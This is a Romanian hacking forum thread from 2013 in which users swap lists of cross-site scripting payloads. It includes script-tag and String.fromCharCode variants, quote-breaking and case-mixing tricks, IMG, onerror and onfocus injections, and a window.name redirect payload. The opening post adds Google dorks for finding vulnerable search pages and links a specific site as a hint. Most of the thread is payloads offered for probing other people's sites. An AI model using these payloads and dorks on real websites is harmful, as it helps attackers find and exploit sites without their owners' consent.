io.kent Posted July 14, 2013 Report Posted July 14, 2013 (edited) Pentru cei curiosi, care cauta incontinu, xss sunt mai multe metode, de cautare vi le las aici..simpla si cunoscuta de majoritate <script>alert("XSS")</script>Sau >script>alert( > XSS DETECTED < )</script>si acum cateva metode mai putin cunoscute...String.fromCharCode(88,83,83)<script>alert(String.fromCharCode(88,83,83))</script>"><script>alert("XSS")</script>"><script>alert(String.fromCharCode(88,83,83))</script>'><script>alert("XSS")</script>'><script>alert(String.fromCharCode(88,83,83))</script><ScRIPt>aLeRT("XSS")</ScRIPt><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>"><ScRIPt>aLeRT("XSS")</ScRIPt>"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>'><ScRIPt>aLeRT("XSS")</ScRIPt>'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt></script><script>alert("XSS")</script></script><script>alert(String.fromCharCode(88,83,83))</script>"/><script>alert("XSS")</script>"/><script>alert(String.fromCharCode(88,83,83))</script>'/><script>alert("XSS")</script>'/><script>alert(String.fromCharCode(88,83,83))</script></SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT></SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>";alert("XSS");"";alert(String.fromCharCode(88,83,83));"';alert("XSS");'';alert(String.fromCharCode(88,83,83));'";alert("XSS")";alert(String.fromCharCode(88,83,83))';alert("XSS")';alert(String.fromCharCode(88,83,83))onmouseover=alert("XSS")<script>alert(String.fromCharCode(88,83,83))</script>caractere admise.. > = %3c < = %3c / = %2fcateva dorks xssinurl:search.php?inurl:find.php?inurl:search.htmlinurl:find.htmlinurl:search.aspxinurl:find.aspxEdit// ajutor aici, detali nu dau o sa vati seama la ce va ajuta!http://www.wocares.com/noquote.php Edited July 14, 2013 by io.kent Quote
m1dst1k Posted July 14, 2013 Report Posted July 14, 2013 ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'';!--"<XSS>=&{()}'>//\\,<'>">">"*"'); alert('XSS<script>alert(1);</script><script>alert('XSS');</script><IMG SRC="javascript:alert('XSS');"><IMG SRC=javascript:alert('XSS')><IMG SRC=JaVaScRiPt:alert('XSS')><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">'></select><script>alert(123)</script><IMG SRC=javascript:alert("XSS")><IMG """><SCRIPT>alert("XSS")</SCRIPT>"><scrscriptipt>alert(1)</scrscriptipt><img src=foo.png onerror=alert(/xssed/) /><IMG """><SCRIPT>alert("XSS")</SCRIPT>"><input type="text" AUTOFOCUS onfocus=alert(1)>Daca tot ai deschis acest topic am pus si eu cateva. Quote
eusimplu Posted July 14, 2013 Report Posted July 14, 2013 (edited) >script>alert( > XSS DETECTED < )</script>Asta nu are cum sa functioneze.Si ai uitat de regex cand nu se pot introduce ghilimelele( " si sau '). Edited July 14, 2013 by eusimplu Quote
dekeeu Posted July 14, 2013 Report Posted July 14, 2013 Asta nu are cum sa functioneze.Poate, depinde de filtru. Quote
eusimplu Posted July 14, 2013 Report Posted July 14, 2013 Poate, depinde de filtru.Ce filtru, nu este logic d.p.d.v. al javascript-ului si nici al HTML-ului! Deschide consola si baga: alert( > XSS DETECTED < )Sirurile in Javascript(si in multe alte limbaje) sunt delimitate de ghilimele(' sau ") exceptie in javascript facand caracterul / folosit pentru expresiile regulate.Fa un fisier html si baga: >script>alert( > XSS DETECTED < )</script>Tagurile se deschid cu <> nu cu << si nici logica in XSS nu are, se foloseste > la inchiderea tag-ului de ce naiba nu se foloseste si la deschidere? Quote
Domnul.Do Posted July 14, 2013 Report Posted July 14, 2013 Sau favoritul meu (ceva mai experimentat , are legatura mai mult cu DOM Clobbering ) <script>document.location=window.name</script> (tag-ul e la alegere)P.o.C:http://jsfiddle.net/gLwCM/ Quote
